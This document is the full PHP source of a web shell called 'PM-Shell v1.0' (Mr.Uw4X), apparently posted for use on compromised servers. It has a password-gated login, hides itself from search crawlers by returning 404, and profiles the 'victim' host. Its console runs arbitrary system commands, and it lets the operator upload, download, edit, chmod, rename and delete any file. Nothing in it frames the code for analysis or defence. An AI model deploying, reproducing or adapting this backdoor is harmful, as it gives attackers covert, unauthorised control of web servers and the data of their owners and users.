PM-Shell_v1.php

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5.  
6. $auth_pass = "776aaf189d504481af2b3535716f2305"; // default: ./Mruw4x21
7. $color = "#00ff00";
8. $default_action = 'FilesMan';
9. $default_use_ajax = true;
10. $default_charset = 'UTF-8';
11. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
12.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
13.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
14.         header('HTTP/1.0 404 Not Found');
15.         exit;
16.     }
17. }
18.  
19. function login_shell() {
20. ?>
21. <html>
22. <head>
23. <link href='http://i48.servimg.com/u/f48/16/08/07/74/indone10.gif' rel='SHORTCUT ICON'/>
24. <title>MShell Mr.Uw4X</title>
25. <style type="text/css">
26. html {
27.     margin: 20px auto;
28.     background: #000000;
29.     color: blue;
30.     text-align: center;
31. }
32. header {
33.     color: blue;
34.     margin: 10px auto;
35. }
36. input[type=password] {
37.     width: 250px;
38.     height: 25px;
39.     color: white;
40.     background: #000000;
41.     border: 1px solid blue;
42.     padding: 5px;
43.     margin-left: 20px;
44.     text-align: center;
45. }
46. </style>
47. </head>
48. <center>
49. <header>
50.     <link href='https://fonts.googleapis.com/css?family=Ubuntu' rel='stylesheet' type='text/css'>
51.     <font style="color:#000;text-shadow:0px 5px 8px #191970;font-size:90px" face="Ubuntu">PM-Shell v1.0</font><br>
52.     <img src="https://s26.postimg.org/yv1hggwhl/Shade.png" width=24% height=60%>
53. <form method="post">
54. <input type="password" name="pass">
55. </form>
56. <?php
57. exit;
58. }
59. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
60.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
61.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
62.     else
63.         login_shell();
64. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
65.     @ob_clean();
66.     $file = $_GET['file'];
67.     header('Content-Description: File Transfer');
68.     header('Content-Type: application/octet-stream');
69.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
70.     header('Expires: 0');
71.     header('Cache-Control: must-revalidate');
72.     header('Pragma: public');
73.     header('Content-Length: ' . filesize($file));
74.     readfile($file);
75.     exit;
76. }
77. //password until here
78. ?>
79. <?php
80. if(get_magic_quotes_gpc()){
81. foreach($_POST as $key=>$value){
82. $_POST[$key] = stripslashes($value);
83. }
84. }
85. echo '<!DOCTYPE HTML>
86. <html>
87. <head>
88. <link href="ttp://i48.servimg.com/u/f48/16/08/07/74/indone10.gif" rel="HORTCUT ICON">
89. <link href="" rel="stylesheet" type="text/css">
90. <title>MShell Mr.Uw4X</title>
91. <style>
92. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
93. @import url(http://fonts.googleapis.com/css?family=Wallpoet);
94. body{
95. font-family: "Ubuntu";
96. font-size: 13px;
97. background-color: black;
98. color:white;
99. }
100. #content tr:hover{
101. background-color: #000;
102. color: #191970;
103. text-shadow:4px 4px 10px #0000ff;
104. }
105. #content .first{
106. background-color: #191970;
107. }
108. table{
109. border: 0px #000000 solid;
110. }
111. a{
112. color:white;
113. text-decoration: none;
114. }
115. a:hover{
116. color:blue;
117. text-shadow:0px 0px 10px #000070;
118. }
119. input{
120. background: #000;
121. color: #fff;
122. -moz-border-radius: 5px;
123. border-radius:5px;}
124.  
125. select,textarea{
126. border: 1px #191970 solid;
127. background: #000000;
128. color: #fff;
129. -moz-border-radius: 5px;
130. -webkit-border-radius:5px;
131. border-radius:5px;
132. }
133. </style>
134. </head>
135. <body>
136. <link href="http://fonts.googleapis.com/css?family=Wallpoet" rel="stylesheet" type="text/css">
137. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">';
138. echo '<tr>';
139. //Starting About victim
140. $kernel = php_uname();
141. $ip = gethostbyname($_SERVER['HTTP_HOST']);
142. /*fuction hdd*/
143. if(!function_exists('posix_getegid')) {
144.     $user = @get_current_user();
145.     $uid = @getmyuid();
146.     $gid = @getmygid();
147.     $group = "?";
148. } else {
149.     $uid = @posix_getpwuid(posix_geteuid());
150.     $gid = @posix_getgrgid(posix_getegid());
151.     $user = $uid['name'];
152.     $uid = $uid['uid'];
153.     $group = $gid['name'];
154.     $gid = $gid['gid'];
155. }
156. $freespace = hdd(disk_free_space("/"));
157. /*Code hdd*/
158. $total = hdd(disk_total_space("/"));
159. $used = $total - $freespace;
160. $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
161. $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
162. $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
163. $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
164. $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
165. /*code wget python perl*/
166. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=blue>OFF</font>";
167. $ds = @ini_get("disable_functions");
168. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
169. if(!function_exists('posix_getegid')) {
170.     $user = @get_current_user();
171.     $uid = @getmyuid();
172.     $gid = @getmygid();
173.     $group = "?";
174. } else {
175.     $uid = @posix_getpwuid(posix_geteuid());
176.     $gid = @posix_getgrgid(posix_getegid());
177.     $user = $uid['name'];
178.     $uid = $uid['uid'];
179.     $group = $gid['name'];
180.     $gid = $gid['gid'];
181. }
182. //eksekusi
183. echo "Name of Shell: <font style='color:#00f;text-shadow:5px 5px 12px #191970;font-size:15px' face='Wallpoet'>Priv-Min Shell Mr.Uw4X</font><br>";
184. echo "System: <font color=blue>".$kernel."</font><br>";
185. echo "Safe Mode: $sm<br>";
186. echo "Disable Functions: $show_ds<br>";
187. echo "Server IP: <font color=blue>".$ip."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
188. echo "Group: <font color=blue>".$group."</font> (".$gid.") User: <font color=blue>".$user."</font> (".$uid.") <br>";
189. echo "HardDisk: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
190. echo "MySQL: $mysql | Curl: $curl | Perl: $perl | Python: $python | WGET: $wget ";
191. //ending about victim
192. //starting home bar
193. echo "<ul>";
194. echo "<center>[ <a href='?'>Home</a> ] [ <a href='?dir=$dir&do=cmd'>Console</a> ] [ <a style='color: red;' href='?logout=true'>Logout</a> ]</center>";
195. echo "</ul>";
196. //fuction menu bar
197. if($_GET['do'] == 'cmd') {
198.     echo "<form method='post'>
199.     <font style='color: #00f;'>".$user."@".$ip.": ~ $ </font>
200.     <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='Enter'>
201.     </form>";
202.     if($_POST['do_cmd']) {
203.         echo "<pre>".exe($_POST['cmd'])."</pre>";
204.     }
205. } elseif($_GET['logout'] == true) {
206.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
207.     echo "<script>window.location='?';</script>";
208. }
209. //ending home bar
210. echo '</tr>';
211. echo '<tr><td><font color="blue">Current Dir :</font> ';
212.  
213. //Code Menu
214. if(isset($_GET['path'])){
215. $path = $_GET['path'];
216. }else{
217. $path = getcwd();
218. }
219. $path = str_replace('\\','/',$path);
220. $paths = explode('/',$path);
221.  
222. foreach($paths as $id=>$pat){
223. if($pat == '' && $id == 0){
224. $a = true;
225. echo '<a href="?path=/">/</a>';
226. continue;
227. }
228. if($pat == '') continue;
229. echo '<a href="?path=';
230. for($i=0;$i<=$id;$i++){
231. echo "$paths[$i]";
232. if($i != $id) echo "/";
233. }
234. echo '">'.$pat.'</a>/';
235. }
236. echo '</td></tr><tr><td><center>';
237. if(isset($_FILES['file'])){
238. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
239. echo '<center><font color="blue">Upload Success</font><br /></center>';
240. }else{
241. echo '<center><font color="red">Upload Failed</font><br/></center>';
242. }
243. }
244. echo '<form enctype="multipart/form-data" method="POST">
245. <font color="white">File Upload :</font> <input type="file" name="file" />
246. <input type="submit" value="upload" />
247. </form>
248. </center></td></tr>';
249. if(isset($_GET['filesrc'])){
250. echo "<tr><td>Current File : ";
251. echo $_GET['filesrc'];
252. echo '</tr></td></table><br />';
253. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
254. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
255. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
256. if($_POST['opt'] == 'chmod'){
257. if(isset($_POST['perm'])){
258. if(chmod($_POST['path'],$_POST['perm'])){
259. echo '<font color="blue">Set Permission Success</font><br/>';
260. }else{
261. echo '<font color="red">Set Permission Failed</font><br />';
262. }
263. }
264. echo '<form method="POST">
265. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
266. <input type="hidden" name="path" value="'.$_POST['path'].'">
267. <input type="hidden" name="opt" value="chmod">
268. <input type="submit" value="Go" />
269. </form>';
270. }elseif($_POST['opt'] == 'rename'){
271. if(isset($_POST['newname'])){
272. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
273. echo '<font color="blue">Ganti Nama Success</font><br/>';
274. }else{
275. echo '<font color="red">Ganti Nama Failed</font><br />';
276. }
277. $_POST['name'] = $_POST['newname'];
278. }
279. echo '<form method="POST">
280. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
281. <input type="hidden" name="path" value="'.$_POST['path'].'">
282. <input type="hidden" name="opt" value="rename">
283. <input type="submit" value="Go" />
284. </form>';
285. } elseif($_POST['opt'] == 'edit'){
286. if(isset($_POST['src'])){
287. $fp = fopen($_POST['path'],'w');
288. if(fwrite($fp,$_POST['src'])){
289. echo '<font color="blue">Success Edit File</font><br/>';
290. }else{
291. echo '<font color="red">Failed Edit File</font><br/>';
292. }
293. fclose($fp);
294. }
295. echo '<form method="POST">
296. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
297. <input type="hidden" name="path" value="'.$_POST['path'].'">
298. <input type="hidden" name="opt" value="edit">
299. <input type="submit" value="Save" />
300. </form>';
301. }
302. echo '</center>';
303. }else{
304. echo '</table><br/><center>';
305. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
306. if($_POST['type'] == 'dir'){
307. if(rmdir($_POST['path'])){
308. echo '<font color="blue">Directory Terhapus</font><br/>';
309. }else{
310. echo '<font color="red">Directory Failed Terhapus                                                                                                                                                                                                                                                                                             </font><br/>';
311. }
312. }elseif($_POST['type'] == 'file'){
313. if(unlink($_POST['path'])){
314. echo '<font color="blue">File Terhapus</font><br/>';
315. }else{
316. echo '<font color="red">File Failed Dihapus</font><br/>';
317. }
318. }
319. }
320. echo '</center>';
321. $scandir = scandir($path);
322. echo '<div id="content"><table width="1250" border="0" cellpadding="3" cellspacing="1" align="center">
323. <tr class="first">
324. <td><center>Name</peller></center></td>
325. <td><center>Type</peller></center></td>
326. <td><center>Last Modify</peller></center></td>
327. <td><center>Owner/Group</peller></center></td>
328. <td><center>Size</peller></center></td>
329. <td><center>Permission</peller></center></td>
330. <td><center>Action</peller></center></td>
331. </tr>';
332. //For Code Column Directory
333. foreach($scandir as $dir){
334. $dtype = filetype("$dir/$dirx");
335. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
336. if(function_exists('posix_getpwuid')) {
337.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
338.                     $downer = $downer['name'];
339.                 } else {
340.                     //$downer = $uid;
341.                     $downer = fileowner("$dir/$dirx");
342.                 }
343.                 if(function_exists('posix_getgrgid')) {
344.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
345.                     $dgrp = $dgrp['name'];
346.                 } else {
347.                     $dgrp = filegroup("$dir/$dirx");
348.                 }
349. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
350. echo '<tr>
351. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>';
352. echo "<td><center>$dtype</center></td>";
353. echo "<td><center>$dtime</center></td>";
354. echo "<td><center>$downer/$dgrp</center></td>";
355. echo "<td><center>--</center></td>
356. <td><center>";
357. if(is_writable($path.'/'.$dir)) echo '<font color="blue">';
358. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
359. echo perms($path.'/'.$dir);
360. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
361.  
362. echo '</center></td>
363. <td><center><form method="POST" action="?option&path='.$path.'">
364. <select name="opt">
365. <option value="delete">Delete</option>
366. <option value="chmod">Chmod</option>
367. <option value="rename">Rename</option>
368. </select>
369. <input type="hidden" name="type" value="dir">
370. <input type="hidden" name="name" value="'.$dir.'">
371. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
372. <input type="submit" value="GO">
373. </form></center></td>
374. </tr>';
375. }
376. //Code For File Column
377. foreach($scandir as $file){
378. $ftype = filetype("$path/$file");
379. $ftime = date("F d Y g:i:s", filemtime("$path/$file"));
380. if(function_exists('posix_getpwuid')) {
381.                 $fowner = @posix_getpwuid(fileowner("$path/$file"));
382.                 $fowner = $fowner['name'];
383.             } else {
384.                 //$downer = $uid;
385.                 $fowner = fileowner("$path/$file");
386.             }
387.             if(function_exists('posix_getgrgid')) {
388.                 $fgrp = @posix_getgrgid(filegroup("$path/$file"));
389.                 $fgrp = $fgrp['name'];
390.             } else {
391.                 $fgrp = filegroup("$path/$file");
392.             }
393. if(!is_file($path.'/'.$file)) continue;
394. $size = filesize($path.'/'.$file)/1024;
395. $size = round($size,3);
396. if($size >= 1024){
397. $size = round($size/1024,2).' MB';
398. }else{
399. $size = $size.' KB';
400. }
401.  
402. echo '<tr>
403. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>';
404. echo "<td><center>$ftype</center></td>";
405. echo "<td><center>$ftime</center></td>";
406. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
407. echo "<td><center>$size</center></td>
408. <td><center>";
409. if(is_writable($path.'/'.$file)) echo '<font color="blue">';
410. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
411. echo perms($path.'/'.$file);
412. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
413. echo '</center></td>
414. <td><center><form method="POST" action="?option&path='.$path.'">
415. <select name="opt">
416. <option value="delete">Delete</option>
417. <option value="chmod">Chmod</option>
418. <option value="rename">Rename</option>
419. <option value="edit">Edit</option>
420. </select>
421. <input type="hidden" name="type" value="file">
422. <input type="hidden" name="name" value="'.$file.'">
423. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
424. <input type="submit" value="GO">
425. </form></center></td>
426. </tr>';
427. }
428. echo '</table>
429. </div>';
430. }
431. echo "<center><hr width=280 color=#191970>Copyright &copy; ".date("Y")." - <a href='https://s1.postimg.org/3i7tcvdrbj/Shade.png'><font color=blue>Mr.Uw4X</font></a></center>
432. </body>
433. </html>";
434. //Function Code HDD + exe
435. function hdd($s) {
436.     if($s >= 1073741824)
437.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
438.     elseif($s >= 1048576)
439.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
440.     elseif($s >= 1024)
441.     return sprintf('%1.2f',$s / 1024 ) .' KB';
442.     else
443.     return $s .' B';
444. }
445. function exe($cmd) {
446.     if(function_exists('system')) {        
447.         @ob_start();       
448.         @system($cmd);     
449.         $buff = @ob_get_contents();        
450.         @ob_end_clean();       
451.         return $buff;  
452.     } elseif(function_exists('exec')) {        
453.         @exec($cmd,$results);      
454.         $buff = "";        
455.         foreach($results as $result) {         
456.             $buff .= $result;      
457.         } return $buff;    
458.     } elseif(function_exists('passthru')) {        
459.         @ob_start();       
460.         @passthru($cmd);       
461.         $buff = @ob_get_contents();        
462.         @ob_end_clean();       
463.         return $buff;  
464.     } elseif(function_exists('shell_exec')) {      
465.         $buff = @shell_exec($cmd);     
466.         return $buff;  
467.     }
468. }
469. function perms($file){
470. $perms = fileperms($file);
471.  
472. if (($perms & 0xC000) == 0xC000) {
473. // Socket
474. $info = 's';
475. } elseif (($perms & 0xA000) == 0xA000) {
476. // Symbolic Link
477. $info = 'l';
478. } elseif (($perms & 0x8000) == 0x8000) {
479. // Regular
480. $info = '-';
481. } elseif (($perms & 0x6000) == 0x6000) {
482. // Block special
483. $info = 'b';
484. } elseif (($perms & 0x4000) == 0x4000) {
485. // Directory
486. $info = 'd';
487. } elseif (($perms & 0x2000) == 0x2000) {
488. // Character special
489. $info = 'c';
490. } elseif (($perms & 0x1000) == 0x1000) {
491. // FIFO pipe
492. $info = 'p';
493. } else {
494. // Unknown
495. $info = 'u';
496. }
497.  
498. // Owner
499. $info .= (($perms & 0x0100) ? 'r' : '-');
500. $info .= (($perms & 0x0080) ? 'w' : '-');
501. $info .= (($perms & 0x0040) ?
502. (($perms & 0x0800) ? 's' : 'x' ) :
503. (($perms & 0x0800) ? 'S' : '-'));
504.  
505. // Group
506. $info .= (($perms & 0x0020) ? 'r' : '-');
507. $info .= (($perms & 0x0010) ? 'w' : '-');
508. $info .= (($perms & 0x0008) ?
509. (($perms & 0x0400) ? 's' : 'x' ) :
510. (($perms & 0x0400) ? 'S' : '-'));
511.  
512. // World
513. $info .= (($perms & 0x0004) ? 'r' : '-');
514. $info .= (($perms & 0x0002) ? 'w' : '-');
515. $info .= (($perms & 0x0001) ?
516. (($perms & 0x0200) ? 't' : 'x' ) :
517. (($perms & 0x0200) ? 'T' : '-'));
518.  
519. return $info;
520. }
521. ?>